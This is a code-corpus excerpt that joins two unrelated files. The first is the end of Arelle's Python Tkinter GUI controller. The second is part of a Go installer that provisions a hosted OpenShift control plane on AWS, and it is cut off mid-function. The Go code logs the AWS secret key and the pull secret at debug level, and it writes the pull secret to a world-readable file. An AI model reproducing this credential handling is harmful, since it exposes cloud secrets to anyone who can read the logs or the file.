if valType in (ModelDocument.Type.SCHEMA, ModelDocument.Type.LINKBASE):
valName = "DTS"
else:
valName = ModelDocument.Type.typeName[valType]
if valType == ModelDocument.Type.VERSIONINGREPORT:
v = _("Validate versioning report")
else:
if self.modelManager.validateCalcLB:
if self.modelManager.validateInferDecimals:
c = _("\nCheck calculations (infer decimals)")
else:
c = _("\nCheck calculations (infer precision)")
else:
c = ""
if self.modelManager.validateUtr:
u = _("\nCheck unit type registry")
else:
u = ""
if self.modelManager.validateDisclosureSystem:
v = _("Validate {0}\nCheck disclosure system rules\n{1}{2}{3}").format(
valName, self.modelManager.disclosureSystem.selection,c,u)
else:
v = _("Validate {0}{1}{2}").format(valName, c, u)
else:
v = _("Validate")
self.validateTooltipText.set(v)
def setValidateCalcLB(self, *args):
self.modelManager.validateCalcLB = self.validateCalcLB.get()
self.config["validateCalcLB"] = self.modelManager.validateCalcLB
self.saveConfig()
self.setValidateTooltipText()
def setValidateInferDecimals(self, *args):
self.modelManager.validateInferDecimals = self.validateInferDecimals.get()
self.config["validateInferDecimals"] = self.modelManager.validateInferDecimals
self.saveConfig()
self.setValidateTooltipText()
def setValidateUtr(self, *args):
self.modelManager.validateUtr = self.validateUtr.get()
self.config["validateUtr"] = self.modelManager.validateUtr
self.saveConfig()
self.setValidateTooltipText()
def setCollectProfileStats(self, *args):
self.modelManager.collectProfileStats = self.collectProfileStats.get()
self.config["collectProfileStats"] = self.modelManager.collectProfileStats
self.saveConfig()
def find(self, *args):
from arelle.DialogFind import find
find(self)
def helpAbout(self, event=None):
from arelle import DialogAbout, Version
from lxml import etree
DialogAbout.about(self.parent,
_("About arelle"),
os.path.join(self.imagesDir, "arelle32.gif"),
_("arelle\u00ae {0} {1}bit {2}\n"
"An open source XBRL platform\n"
"\u00a9 2010-2015 Mark V Systems Limited\n"
"All rights reserved\nhttp://www.arelle.org\[email protected]\n\n"
"Licensed under the Apache License, Version 2.0 (the \"License\"); "
"you may not use this file except in compliance with the License. "
"You may obtain a copy of the License at\n\n"
"http://www.apache.org/licenses/LICENSE-2.0\n\n"
"Unless required by applicable law or agreed to in writing, software "
"distributed under the License is distributed on an \"AS IS\" BASIS, "
"WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. "
"See the License for the specific language governing permissions and "
"limitations under the License."
"\n\nIncludes:"
"\n Python\u00ae {4[0]}.{4[1]}.{4[2]} \u00a9 2001-2013 Python Software Foundation"
"\n PyParsing \u00a9 2003-2013 Paul T. McGuire"
"\n lxml {5[0]}.{5[1]}.{5[2]} \u00a9 2004 Infrae, ElementTree \u00a9 1999-2004 by Fredrik Lundh"
"\n xlrd \u00a9 2005-2013 Stephen J. Machin, Lingfo Pty Ltd, \u00a9 2001 D. Giffin, \u00a9 2000 A. Khan"
"\n xlwt \u00a9 2007 Stephen J. Machin, Lingfo Pty Ltd, \u00a9 2005 R. V. Kiseliov"
"{3}"
)
.format(self.__version__, self.systemWordSize, Version.version,
_("\n Bottle \u00a9 2011-2013 Marcel Hellkamp") if self.hasWebServer else "",
sys.version_info, etree.LXML_VERSION))
# worker threads addToLog
def addToLog(self, message, messageCode="", messageArgs=None, file="", level=logging.INFO):
if messageCode and messageCode not in message: # prepend message code
message = "[{}] {}".format(messageCode, message)
if file:
if isinstance(file, (tuple,list,set)):
message += " - " + ", ".join(file)
elif isinstance(file, _STR_BASE):
message += " - " + file
if isinstance(messageArgs, dict):
message = message % messageArgs
self.uiThreadQueue.put((self.uiAddToLog, [message]))
# ui thread addToLog
def uiAddToLog(self, message):
try:
self.logView.append(message)
except:
pass
def logClear(self, *ignore):
self.logView.clear()
def logSelect(self, *ignore):
self.logView.select()
def logSaveToFile(self, *ignore):
filename = self.uiFileDialog("save",
title=_("arelle - Save Messages Log"),
initialdir=".",
filetypes=[(_("Txt file"), "*.txt")],
defaultextension=".txt")
if not filename:
return False
try:
self.logView.saveToFile(filename)
except (IOError, EnvironmentError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to save {0}:\n{1}").format(
filename, err),
parent=self.parent)
return True
# worker threads viewModelObject
def viewModelObject(self, modelXbrl, objectId):
self.waitForUiThreadQueue() # force prior ui view updates if any
self.uiThreadQueue.put((self.uiViewModelObject, [modelXbrl, objectId]))
# ui thread viewModelObject
def uiViewModelObject(self, modelXbrl, objectId):
modelXbrl.viewModelObject(objectId)
# worker threads viewModelObject
def reloadViews(self, modelXbrl):
self.uiThreadQueue.put((self.uiReloadViews, [modelXbrl]))
# ui thread viewModelObject
def uiReloadViews(self, modelXbrl):
for view in modelXbrl.views:
view.view()
# worker threads showStatus
def showStatus(self, message, clearAfter=None):
self.uiThreadQueue.put((self.uiShowStatus, [message, clearAfter]))
# ui thread showStatus
def uiClearStatusTimerEvent(self):
if self.statusbarTimerId: # if timer still wanted, clear status
self.statusbar["text"] = ""
self.statusbarTimerId = None
def uiShowStatus(self, message, clearAfter=None):
if self.statusbarTimerId: # ignore timer
self.statusbarTimerId = None
self.statusbar["text"] = message
if clearAfter is not None and clearAfter > 0:
self.statusbarTimerId = self.statusbar.after(clearAfter, self.uiClearStatusTimerEvent)
# web authentication password request
def internet_user_password(self, host, realm):
from arelle.DialogUserPassword import askUserPassword
untilDone = threading.Event()
result = []
self.uiThreadQueue.put((askUserPassword, [self.parent, host, realm, untilDone, result]))
untilDone.wait()
return result[0]
# web file login requested
def internet_logon(self, url, quotedUrl, dialogCaption, dialogText):
from arelle.DialogUserPassword import askInternetLogon
untilDone = threading.Event()
result = []
self.uiThreadQueue.put((askInternetLogon, [self.parent, url, quotedUrl, dialogCaption, dialogText, untilDone, result]))
untilDone.wait()
return result[0]
def waitForUiThreadQueue(self):
for i in range(40): # max 2 secs
if self.uiThreadQueue.empty():
break
time.sleep(0.05)
def uiThreadChecker(self, widget, delayMsecs=100): # 10x per second
# process callback on main (UI) thread
while not self.uiThreadQueue.empty():
try:
(callback, args) = self.uiThreadQueue.get(block=False)
except queue.Empty:
pass
else:
callback(*args)
widget.after(delayMsecs, lambda: self.uiThreadChecker(widget))
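# File dialog helper: multi-select "open" uses tkinter (unpacking the "{file1} {file2}"
# result on non-Mac platforms), Windows with win32gui uses the native
# GetOpenFileNameW/GetSaveFileNameW dialogs, otherwise falls back to tkinter's
# askopenfilename/asksaveasfilename.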
def uiFileDialog(self, action, title=None, initialdir=None, filetypes=[], defaultextension=None, owner=None, multiple=False, parent=None):
if parent is None: parent = self.parent
if multiple and action == "open": # return as simple list of file names
multFileNames = tkinter.filedialog.askopenfilename(
multiple=True,
title=title,
initialdir=initialdir,
filetypes=[] if self.isMac else filetypes,
defaultextension=defaultextension,
parent=parent)
if self.isMac:
return multFileNames
return re.findall("[{]([^}]+)[}]", # multiple returns "{file1} {file2}..."
multFileNames)
elif self.hasWin32gui:
import win32gui
try:
filename, filter, flags = {"open":win32gui.GetOpenFileNameW,
"save":win32gui.GetSaveFileNameW}[action](
hwndOwner=(owner if owner else parent).winfo_id(),
hInstance=win32gui.GetModuleHandle(None),
Filter='\0'.join(e for t in filetypes+['\0'] for e in t),
MaxFile=4096,
InitialDir=initialdir,
Title=title,
DefExt=defaultextension)
return filename
except win32gui.error:
return ''
else:
return {"open":tkinter.filedialog.askopenfilename,
"save":tkinter.filedialog.asksaveasfilename}[action](
title=title,
initialdir=initialdir,
filetypes=[] if self.isMac else filetypes,
defaultextension=defaultextension,
parent=parent)
from arelle import DialogFormulaParameters
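# Logging handler that formats each record as "[messageCode] message - file" and
# forwards it to the GUI log pane via CntlrWinMain.addToLog (which marshals it onto
# the UI thread queue).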
class WinMainLogHandler(logging.Handler):
def __init__(self, cntlr):
super(WinMainLogHandler, self).__init__()
self.cntlr = cntlr
#formatter = logging.Formatter("%(asctime)s - %(name)s - %(levelname)s - %(message)s - %(file)s %(sourceLine)s")
formatter = Cntlr.LogFormatter("[%(messageCode)s] %(message)s - %(file)s")
self.setFormatter(formatter)
def flush(self):
''' Nothing to flush '''
def emit(self, logRecord):
# add to logView
msg = self.format(logRecord)
try:
self.cntlr.addToLog(msg)
except:
pass
class TkinterCallWrapper:
"""Replacement for internal tkinter class. Stores function to call when some user
defined Tcl function is called e.g. after an event occurred."""
def __init__(self, func, subst, widget):
"""Store FUNC, SUBST and WIDGET as members."""
self.func = func
self.subst = subst
self.widget = widget
def __call__(self, *args):
"""Apply first function SUBST to arguments, than FUNC."""
try:
if self.subst:
args = self.subst(*args)
return self.func(*args)
except SystemExit as msg:
raise SystemExit(msg)
except Exception:
# this was tkinter's standard coding: self.widget._report_exception()
exc_type, exc_value, exc_traceback = sys.exc_info()
msg = ''.join(traceback.format_exception_only(exc_type, exc_value))
tracebk = ''.join(traceback.format_tb(exc_traceback, limit=7))
tkinter.messagebox.showerror(_("Exception"),
_("{0}\nCall trace\n{1}").format(msg, tracebk))
def main():
# this is the entry called by arelleGUI.pyw for windows
global restartMain
while restartMain:
restartMain = False
application = Tk()
cntlrWinMain = CntlrWinMain(application)
application.protocol("WM_DELETE_WINDOW", cntlrWinMain.quit)
if sys.platform == "darwin" and not __file__.endswith(".app/Contents/MacOS/arelle"):
# not built app - launches behind python or eclipse
application.lift()
application.call('wm', 'attributes', '.', '-topmost', True)
cntlrWinMain.uiThreadQueue.put((application.call, ['wm', 'attributes', '.', '-topmost', False]))
os.system('''/usr/bin/osascript -e 'tell app "Finder" to set frontmost of process "Python" to true' ''')
application.mainloop()
if __name__ == "__main__":
# this is the entry called by MacOS open and MacOS shell scripts
# check if ARELLE_ARGS are used to emulate command line operation
if os.getenv("ARELLE_ARGS"):
# command line mode
from arelle import CntlrCmdLine
CntlrCmdLine.main()
else:
# GUI mode
main()
|
[] |
[] |
[
"ARELLE_ARGS"
] |
[]
|
["ARELLE_ARGS"]
|
python
| 1 | 0 | |
contrib/pkg/aws/install.go
|
package aws
import (
crand "crypto/rand"
"encoding/base64"
"encoding/hex"
"encoding/json"
"fmt"
"hash/fnv"
"io"
"io/ioutil"
"math/big"
"math/rand"
"net"
"os"
"os/user"
"path/filepath"
"strings"
"time"
gocidr "github.com/apparentlymart/go-cidr/cidr"
log "github.com/sirupsen/logrus"
"golang.org/x/crypto/bcrypt"
corev1 "k8s.io/api/core/v1"
"k8s.io/apimachinery/pkg/api/errors"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/apimachinery/pkg/apis/meta/v1/unstructured"
"k8s.io/apimachinery/pkg/runtime"
"k8s.io/apimachinery/pkg/runtime/schema"
"k8s.io/apimachinery/pkg/runtime/serializer"
"k8s.io/apimachinery/pkg/util/intstr"
"k8s.io/apimachinery/pkg/util/sets"
"k8s.io/apimachinery/pkg/util/wait"
"k8s.io/client-go/dynamic"
kubeclient "k8s.io/client-go/kubernetes"
"k8s.io/client-go/rest"
"k8s.io/client-go/tools/clientcmd"
"k8s.io/client-go/util/retry"
"github.com/openshift/hypershift-toolkit/pkg/api"
"github.com/openshift/hypershift-toolkit/pkg/ignition"
"github.com/openshift/hypershift-toolkit/pkg/pki"
"github.com/openshift/hypershift-toolkit/pkg/render"
)
const (
routerNodePortHTTP = 31080
routerNodePortHTTPS = 31443
externalOauthPort = 8443
workerMachineSetCount = 3
)
var (
excludeManifests = []string{
"kube-apiserver-service.yaml",
"openshift-apiserver-service.yaml",
"openvpn-server-service.yaml",
"v4-0-config-system-branding.yaml",
"oauth-server-service.yaml",
}
coreScheme = runtime.NewScheme()
coreCodecs = serializer.NewCodecFactory(coreScheme)
)
func init() {
if err := corev1.AddToScheme(coreScheme); err != nil {
panic(err)
}
}
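// InstallCluster provisions a hosted control plane named `name` on the management
// cluster: it reads the SSH key, pull secret, AWS credentials, release image,
// infrastructure, network and DNS-zone details from the management cluster, creates
// the target namespace and NodePort services, sets up the AWS EIP, network load
// balancers, target groups, listeners and Route53 records, generates PKI, worker
// ignition (uploaded to S3) and rendered manifests, applies them, and optionally
// waits for the API, bootstrap pod, nodes and cluster operators to become ready.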
func InstallCluster(name, releaseImage, dhParamsFile string, waitForReady bool) error {
// First, ensure that we can access the host cluster
cfg, err := loadConfig()
if err != nil {
return fmt.Errorf("cannot access existing cluster; make sure a connection to host cluster is available: %v", err)
}
dynamicClient, err := dynamic.NewForConfig(cfg)
if err != nil {
return fmt.Errorf("cannot obtain dynamic client: %v", err)
}
// Extract config information from management cluster
sshKey, err := getSSHPublicKey(dynamicClient)
if err != nil {
return fmt.Errorf("failed to fetch an SSH public key from existing cluster: %v", err)
}
log.Debugf("The SSH public key is: %s", string(sshKey))
client, err := kubeclient.NewForConfig(cfg)
if err != nil {
return fmt.Errorf("failed to obtain a kubernetes client from existing configuration: %v", err)
}
awsKey, awsSecretKey, err := getAWSCredentials(client)
if err != nil {
return fmt.Errorf("failed to obtain AWS credentials from host cluster: %v", err)
}
log.Debugf("AWS key: %s, secret: %s", awsKey, awsSecretKey)
if releaseImage == "" {
releaseImage, err = getReleaseImage(dynamicClient)
if err != nil {
return fmt.Errorf("failed to obtain release image from host cluster: %v", err)
}
}
pullSecret, err := getPullSecret(client)
if err != nil {
return fmt.Errorf("failed to obtain a pull secret from cluster: %v", err)
}
log.Debugf("The pull secret is: %v", pullSecret)
infraName, region, err := getInfrastructureInfo(dynamicClient)
if err != nil {
return fmt.Errorf("failed to obtain infrastructure info for cluster: %v", err)
}
log.Debugf("The management cluster infra name is: %s", infraName)
log.Debugf("The management cluster AWS region is: %s", region)
serviceCIDR, podCIDR, err := getNetworkInfo(dynamicClient)
if err != nil {
return fmt.Errorf("failed to obtain network info for cluster: %v", err)
}
dnsZoneID, parentDomain, err := getDNSZoneInfo(dynamicClient)
if err != nil {
return fmt.Errorf("failed to obtain public zone information: %v", err)
}
log.Debugf("Using public DNS Zone: %s and parent suffix: %s", dnsZoneID, parentDomain)
machineNames, err := getMachineNames(dynamicClient)
if err != nil {
return fmt.Errorf("failed to fetch machine names for cluster: %v", err)
}
// Start creating resources on management cluster
_, err = client.CoreV1().Namespaces().Get(name, metav1.GetOptions{})
if err == nil {
return fmt.Errorf("target namespace %s already exists on management cluster", name)
}
if !errors.IsNotFound(err) {
return fmt.Errorf("unexpected error getting namespaces from management cluster: %v", err)
}
log.Infof("Creating namespace %s", name)
ns := &corev1.Namespace{}
ns.Name = name
_, err = client.CoreV1().Namespaces().Create(ns)
if err != nil {
return fmt.Errorf("failed to create namespace %s: %v", name, err)
}
// Ensure that we can run privileged pods
if err = ensurePrivilegedSCC(dynamicClient, name); err != nil {
return fmt.Errorf("failed to ensure privileged SCC for the new namespace: %v", err)
}
// Create pull secret
log.Infof("Creating pull secret")
if err := createPullSecret(client, name, pullSecret); err != nil {
return fmt.Errorf("failed to create pull secret: %v", err)
}
// Create Kube APIServer service
log.Infof("Creating Kube API service")
apiNodePort, err := createKubeAPIServerService(client, name)
if err != nil {
return fmt.Errorf("failed to create kube apiserver service: %v", err)
}
log.Infof("Created Kube API service with NodePort %d", apiNodePort)
log.Infof("Creating VPN service")
vpnNodePort, err := createVPNServerService(client, name)
if err != nil {
return fmt.Errorf("failed to create vpn server service: %v", err)
}
log.Infof("Created VPN service with NodePort %d", vpnNodePort)
log.Infof("Creating Openshift API service")
openshiftClusterIP, err := createOpenshiftService(client, name)
if err != nil {
return fmt.Errorf("failed to create openshift server service: %v", err)
}
log.Infof("Created Openshift API service with cluster IP: %s", openshiftClusterIP)
oauthNodePort, err := createOauthService(client, name)
if err != nil {
return fmt.Errorf("failed to create Oauth server service: %v", err)
}
log.Infof("Created Oauth server service with NodePort: %d", oauthNodePort)
// Fetch AWS cloud data
aws, err := NewAWSHelper(awsKey, awsSecretKey, region, infraName)
if err != nil {
return fmt.Errorf("cannot create an AWS client: %v", err)
}
lbInfo, err := aws.LoadBalancerInfo(machineNames)
if err != nil {
return fmt.Errorf("cannot get load balancer info: %v", err)
}
log.Infof("Using VPC: %s, Zone: %s, Subnet: %s", lbInfo.VPC, lbInfo.Zone, lbInfo.Subnet)
machineID, machineIP, err := getMachineInfo(dynamicClient, machineNames, fmt.Sprintf("%s-worker-%s", infraName, lbInfo.Zone))
if err != nil {
return fmt.Errorf("cannot get machine info: %v", err)
}
log.Infof("Using management machine with ID: %s and IP: %s", machineID, machineIP)
apiLBName := generateLBResourceName(infraName, name, "api")
apiAllocID, apiPublicIP, err := aws.EnsureEIP(apiLBName)
if err != nil {
return fmt.Errorf("cannot allocate API load balancer EIP: %v", err)
}
log.Infof("Allocated EIP with ID: %s, and IP: %s", apiAllocID, apiPublicIP)
apiLBARN, apiLBDNS, err := aws.EnsureNLB(apiLBName, lbInfo.Subnet, apiAllocID)
if err != nil {
return fmt.Errorf("cannot create network load balancer: %v", err)
}
log.Infof("Created API load balancer with ARN: %s, DNS: %s", apiLBARN, apiLBDNS)
apiTGARN, err := aws.EnsureTargetGroup(lbInfo.VPC, apiLBName, apiNodePort)
if err != nil {
return fmt.Errorf("cannot create API target group: %v", err)
}
log.Infof("Created API target group ARN: %s", apiTGARN)
oauthTGName := generateLBResourceName(infraName, name, "oauth")
oauthTGARN, err := aws.EnsureTargetGroup(lbInfo.VPC, oauthTGName, oauthNodePort)
if err != nil {
return fmt.Errorf("cannot create OAuth target group: %v", err)
}
if err = aws.EnsureTarget(apiTGARN, machineIP); err != nil {
return fmt.Errorf("cannot create API load balancer target: %v", err)
}
log.Infof("Created API load balancer target to %s", machineIP)
if err = aws.EnsureTarget(oauthTGARN, machineIP); err != nil {
return fmt.Errorf("cannot create OAuth load balancer target: %v", err)
}
log.Infof("Created OAuth load balancer target to %s", machineIP)
err = aws.EnsureListener(apiLBARN, apiTGARN, 6443, false)
if err != nil {
return fmt.Errorf("cannot create API listener: %v", err)
}
log.Infof("Created API load balancer listener")
err = aws.EnsureListener(apiLBARN, oauthTGARN, externalOauthPort, false)
if err != nil {
return fmt.Errorf("cannot create OAuth listener: %v", err)
}
log.Infof("Created OAuth load balancer listener")
apiDNSName := fmt.Sprintf("api.%s.%s", name, parentDomain)
err = aws.EnsureCNameRecord(dnsZoneID, apiDNSName, apiLBDNS)
if err != nil {
return fmt.Errorf("cannot create API DNS record: %v", err)
}
log.Infof("Created DNS record for API name: %s", apiDNSName)
routerLBName := generateLBResourceName(infraName, name, "apps")
routerLBARN, routerLBDNS, err := aws.EnsureNLB(routerLBName, lbInfo.Subnet, "")
if err != nil {
return fmt.Errorf("cannot create router load balancer: %v", err)
}
log.Infof("Created router load balancer with ARN: %s, DNS: %s", routerLBARN, routerLBDNS)
routerHTTPTGName := generateLBResourceName(infraName, name, "http")
routerHTTPARN, err := aws.EnsureTargetGroup(lbInfo.VPC, routerHTTPTGName, routerNodePortHTTP)
if err != nil {
return fmt.Errorf("cannot create router HTTP target group: %v", err)
}
log.Infof("Created router HTTP target group ARN: %s", routerHTTPARN)
err = aws.EnsureListener(routerLBARN, routerHTTPARN, 80, false)
if err != nil {
return fmt.Errorf("cannot create router HTTP listener: %v", err)
}
log.Infof("Created router HTTP load balancer listener")
routerHTTPSTGName := generateLBResourceName(infraName, name, "https")
routerHTTPSARN, err := aws.EnsureTargetGroup(lbInfo.VPC, routerHTTPSTGName, routerNodePortHTTPS)
if err != nil {
return fmt.Errorf("cannot create router HTTPS target group: %v", err)
}
log.Infof("Created router HTTPS target group ARN: %s", routerHTTPSARN)
err = aws.EnsureListener(routerLBARN, routerHTTPSARN, 443, false)
if err != nil {
return fmt.Errorf("cannot create router HTTPS listener: %v", err)
}
log.Infof("Created router HTTPS load balancer listener")
routerDNSName := fmt.Sprintf("*.apps.%s.%s", name, parentDomain)
err = aws.EnsureCNameRecord(dnsZoneID, routerDNSName, routerLBDNS)
if err != nil {
return fmt.Errorf("cannot create router DNS record: %v", err)
}
log.Infof("Created DNS record for router name: %s", routerDNSName)
vpnLBName := generateLBResourceName(infraName, name, "vpn")
vpnLBARN, vpnLBDNS, err := aws.EnsureNLB(vpnLBName, lbInfo.Subnet, "")
if err != nil {
return fmt.Errorf("cannot create vpn load balancer: %v", err)
}
log.Infof("Created VPN load balancer with ARN: %s and DNS: %s", vpnLBARN, vpnLBDNS)
vpnTGARN, err := aws.EnsureUDPTargetGroup(lbInfo.VPC, vpnLBName, vpnNodePort, apiNodePort)
if err != nil {
return fmt.Errorf("cannot create VPN target group: %v", err)
}
log.Infof("Created VPN target group ARN: %s", vpnTGARN)
if err = aws.EnsureTarget(vpnTGARN, machineID); err != nil {
return fmt.Errorf("cannot create VPN load balancer target: %v", err)
}
log.Infof("Created VPN load balancer target to %s", machineID)
err = aws.EnsureListener(vpnLBARN, vpnTGARN, 1194, true)
if err != nil {
return fmt.Errorf("cannot create VPN listener: %v", err)
}
log.Infof("Created VPN load balancer listener")
vpnDNSName := fmt.Sprintf("vpn.%s.%s", name, parentDomain)
err = aws.EnsureCNameRecord(dnsZoneID, vpnDNSName, vpnLBDNS)
if err != nil {
return fmt.Errorf("cannot create router DNS record: %v", err)
}
log.Infof("Created DNS record for VPN: %s", vpnDNSName)
err = aws.EnsureWorkersAllowNodePortAccess()
if err != nil {
return fmt.Errorf("cannot setup security group for worker nodes: %v", err)
}
log.Infof("Ensured that node ports on workers are accessible")
_, serviceCIDRNet, err := net.ParseCIDR(serviceCIDR)
if err != nil {
return fmt.Errorf("cannot parse service CIDR %s: %v", serviceCIDR, err)
}
_, podCIDRNet, err := net.ParseCIDR(podCIDR)
if err != nil {
return fmt.Errorf("cannot parse pod CIDR %s: %v", podCIDR, err)
}
serviceCIDRPrefixLen, _ := serviceCIDRNet.Mask.Size()
clusterServiceCIDR, exceedsMax := gocidr.NextSubnet(serviceCIDRNet, serviceCIDRPrefixLen)
if exceedsMax {
return fmt.Errorf("cluster service CIDR exceeds max address space")
}
podCIDRPrefixLen, _ := podCIDRNet.Mask.Size()
clusterPodCIDR, exceedsMax := gocidr.NextSubnet(podCIDRNet, podCIDRPrefixLen)
if exceedsMax {
return fmt.Errorf("cluster pod CIDR exceeds max address space")
}
params := api.NewClusterParams()
params.Namespace = name
params.ExternalAPIDNSName = apiDNSName
params.ExternalAPIPort = 6443
params.ExternalAPIIPAddress = apiPublicIP
params.ExternalOpenVPNDNSName = vpnDNSName
params.ExternalOpenVPNPort = 1194
params.ExternalOauthPort = externalOauthPort
params.APINodePort = uint(apiNodePort)
params.ServiceCIDR = clusterServiceCIDR.String()
params.PodCIDR = clusterPodCIDR.String()
params.ReleaseImage = releaseImage
params.IngressSubdomain = fmt.Sprintf("apps.%s.%s", name, parentDomain)
params.OpenShiftAPIClusterIP = openshiftClusterIP
params.OpenVPNNodePort = fmt.Sprintf("%d", vpnNodePort)
params.BaseDomain = fmt.Sprintf("%s.%s", name, parentDomain)
params.CloudProvider = "AWS"
params.InternalAPIPort = 6443
params.EtcdClientName = "etcd-client"
params.NetworkType = "OpenShiftSDN"
params.ImageRegistryHTTPSecret = generateImageRegistrySecret()
params.RouterNodePortHTTP = fmt.Sprintf("%d", routerNodePortHTTP)
params.RouterNodePortHTTPS = fmt.Sprintf("%d", routerNodePortHTTPS)
params.RouterServiceType = "NodePort"
params.Replicas = "1"
workingDir, err := ioutil.TempDir("", "")
if err != nil {
return err
}
log.Infof("The working directory is %s", workingDir)
pkiDir := filepath.Join(workingDir, "pki")
if err = os.Mkdir(pkiDir, 0755); err != nil {
return fmt.Errorf("cannot create temporary PKI directory: %v", err)
}
log.Info("Generating PKI")
if len(dhParamsFile) > 0 {
if err = copyFile(dhParamsFile, filepath.Join(pkiDir, "openvpn-dh.pem")); err != nil {
return fmt.Errorf("cannot copy dh parameters file %s: %v", dhParamsFile, err)
}
}
if err := pki.GeneratePKI(params, pkiDir); err != nil {
return fmt.Errorf("failed to generate PKI assets: %v", err)
}
manifestsDir := filepath.Join(workingDir, "manifests")
if err = os.Mkdir(manifestsDir, 0755); err != nil {
return fmt.Errorf("cannot create temporary manifests directory: %v", err)
}
pullSecretFile := filepath.Join(workingDir, "pull-secret")
if err = ioutil.WriteFile(pullSecretFile, []byte(pullSecret), 0644); err != nil {
return fmt.Errorf("failed to create temporary pull secret file: %v", err)
}
log.Info("Generating ignition for workers")
if err = ignition.GenerateIgnition(params, sshKey, pullSecretFile, pkiDir, workingDir); err != nil {
return fmt.Errorf("cannot generate ignition file for workers: %v", err)
}
// Ensure that S3 bucket with ignition file in it exists
bucketName := generateBucketName(infraName, name, "ign")
log.Infof("Ensuring ignition bucket exists")
if err = aws.EnsureIgnitionBucket(bucketName, filepath.Join(workingDir, "bootstrap.ign")); err != nil {
return fmt.Errorf("failed to ensure ignition bucket exists: %v", err)
}
log.Info("Rendering Manifests")
render.RenderPKISecrets(pkiDir, manifestsDir, true, true, true)
caBytes, err := ioutil.ReadFile(filepath.Join(pkiDir, "combined-ca.crt"))
if err != nil {
return fmt.Errorf("failed to render PKI secrets: %v", err)
}
params.OpenshiftAPIServerCABundle = base64.StdEncoding.EncodeToString(caBytes)
if err = render.RenderClusterManifests(params, pullSecretFile, manifestsDir, true, true, true, true, true); err != nil {
return fmt.Errorf("failed to render manifests for cluster: %v", err)
}
// Create a machineset for the new cluster's worker nodes
if err = generateWorkerMachineset(dynamicClient, infraName, lbInfo.Zone, name, routerLBName, filepath.Join(manifestsDir, "machineset.json")); err != nil {
return fmt.Errorf("failed to generate worker machineset: %v", err)
}
if err = generateUserDataSecret(name, bucketName, filepath.Join(manifestsDir, "machine-user-data.json")); err != nil {
return fmt.Errorf("failed to generate user data secret: %v", err)
}
kubeadminPassword, err := generateKubeadminPassword()
if err != nil {
return fmt.Errorf("failed to generate kubeadmin password: %v", err)
}
if err = generateKubeadminPasswordTargetSecret(kubeadminPassword, filepath.Join(manifestsDir, "kubeadmin-secret.json")); err != nil {
return fmt.Errorf("failed to create kubeadmin secret manifest for target cluster: %v", err)
}
if err = generateKubeadminPasswordSecret(kubeadminPassword, filepath.Join(manifestsDir, "kubeadmin-host-secret.json")); err != nil {
return fmt.Errorf("failed to create kubeadmin secret manifest for management cluster: %v", err)
}
if err = generateKubeconfigSecret(filepath.Join(pkiDir, "admin.kubeconfig"), filepath.Join(manifestsDir, "kubeconfig-secret.json")); err != nil {
return fmt.Errorf("failed to create kubeconfig secret manifest for management cluster: %v", err)
}
if err = generateTargetPullSecret([]byte(pullSecret), filepath.Join(manifestsDir, "user-pull-secret.json")); err != nil {
return fmt.Errorf("failed to create pull secret manifest for target cluster: %v", err)
}
// Create the system branding manifest (cannot be applied because it's too large)
if err = createBrandingSecret(client, name, filepath.Join(manifestsDir, "v4-0-config-system-branding.yaml")); err != nil {
return fmt.Errorf("failed to create oauth branding secret: %v", err)
}
excludedDir, err := ioutil.TempDir("", "")
if err != nil {
return fmt.Errorf("failed to create a temporary directory for excluded manifests")
}
initialExclude := append(excludeManifests, "etcd-cluster.yaml")
if err = applyManifests(cfg, name, manifestsDir, initialExclude, excludedDir); err != nil {
return fmt.Errorf("failed to apply manifests: %v", err)
}
time.Sleep(30 * time.Second)
if err = applyManifests(cfg, name, excludedDir, excludeManifests, manifestsDir); err != nil {
return fmt.Errorf("failed to apply etcd cluster manifest")
}
log.Infof("Cluster resources applied")
if waitForReady {
log.Infof("Waiting up to 10 minutes for API endpoint to be available.")
if err = waitForAPIEndpoint(pkiDir, apiDNSName); err != nil {
return fmt.Errorf("failed to access API endpoint: %v", err)
}
log.Infof("API is available at %s", fmt.Sprintf("https://%s:6443", apiDNSName))
log.Infof("Waiting up to 5 minutes for bootstrap pod to complete.")
if err = waitForBootstrapPod(client, name); err != nil {
return fmt.Errorf("failed to wait for bootstrap pod to complete: %v", err)
}
log.Infof("Bootstrap pod has completed.")
// Force the oauth server to restart so it can pick up the kubeadmin password
if err = updateOAuthDeployment(client, name); err != nil {
return fmt.Errorf("failed to update OAuth server deployment: %v", err)
}
log.Infof("OAuth server deployment updated.")
targetClusterCfg, err := getTargetClusterConfig(pkiDir)
if err != nil {
return fmt.Errorf("cannot create target cluster client config: %v", err)
}
targetClient, err := kubeclient.NewForConfig(targetClusterCfg)
if err != nil {
return fmt.Errorf("cannot create target cluster client: %v", err)
}
log.Infof("Waiting up to 10 minutes for nodes to be ready.")
if err = waitForNodesReady(targetClient, workerMachineSetCount); err != nil {
return fmt.Errorf("failed to wait for nodes ready: %v", err)
}
log.Infof("Nodes (%d) are ready", workerMachineSetCount)
log.Infof("Waiting up to 15 minutes for cluster operators to be ready.")
if err = waitForClusterOperators(targetClusterCfg); err != nil {
return fmt.Errorf("failed to wait for cluster operators: %v", err)
}
}
log.Infof("Cluster API URL: %s", fmt.Sprintf("https://%s:6443", apiDNSName))
log.Infof("Kubeconfig is available in secret %q in the %s namespace", "admin-kubeconfig", name)
log.Infof("Console URL: %s", fmt.Sprintf("https://console-openshift-console.%s", params.IngressSubdomain))
log.Infof("kubeadmin password is available in secret %q in the %s namespace", "kubeadmin-password", name)
return nil
}
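// applyManifests moves the excluded manifest files into excludedDir, then applies the
// remaining manifests in directory to the given namespace, retrying up to 3 times at
// roughly 10-second intervals.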
func applyManifests(cfg *rest.Config, namespace, directory string, exclude []string, excludedDir string) error {
for _, f := range exclude {
name := filepath.Join(directory, f)
targetName := filepath.Join(excludedDir, f)
if err := os.Rename(name, targetName); err != nil {
return fmt.Errorf("cannot move %s: %v", name, err)
}
}
backoff := wait.Backoff{
Steps: 3,
Duration: 10 * time.Second,
Factor: 1.0,
Jitter: 0.1,
}
attempt := 0
err := retry.OnError(backoff, func(err error) bool { return true }, func() error {
attempt++
log.Infof("Applying Manifests. Attempt %d/3", attempt)
applier := NewApplier(cfg, namespace)
return applier.ApplyFile(directory)
})
if err != nil {
return fmt.Errorf("Failed to apply manifests: %v", err)
}
return nil
}
func createBrandingSecret(client kubeclient.Interface, namespace, fileName string) error {
objBytes, err := ioutil.ReadFile(fileName)
if err != nil {
return err
}
